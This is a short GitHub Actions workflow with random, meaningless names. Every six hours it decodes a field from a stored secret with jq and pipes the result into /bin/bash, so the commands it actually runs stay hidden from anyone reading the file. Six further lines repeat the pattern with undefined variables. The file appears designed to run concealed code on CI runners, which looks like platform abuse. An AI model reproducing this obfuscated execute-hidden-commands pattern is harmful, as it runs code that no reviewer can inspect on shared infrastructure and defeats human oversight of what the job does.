name: chucaiwei8917
on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chucaiwei8917
        env:
          b50: ${{ secrets.b50 }}
        run: |
          echo $b50 | jq -r .q2 | /bin/bash
          echo $s92 | jq -r .lfj288 | /bin/bash
          echo $ofpx003 | jq -r .ritt452 | /bin/bash
          echo $vv939 | jq -r .jb413 | /bin/bash
          echo $l62 | jq -r .unkt9372 | /bin/bash
          echo $vz67805 | jq -r .egobu408 | /bin/bash
          echo $dvg8928 | jq -r .jz602 | /bin/bash

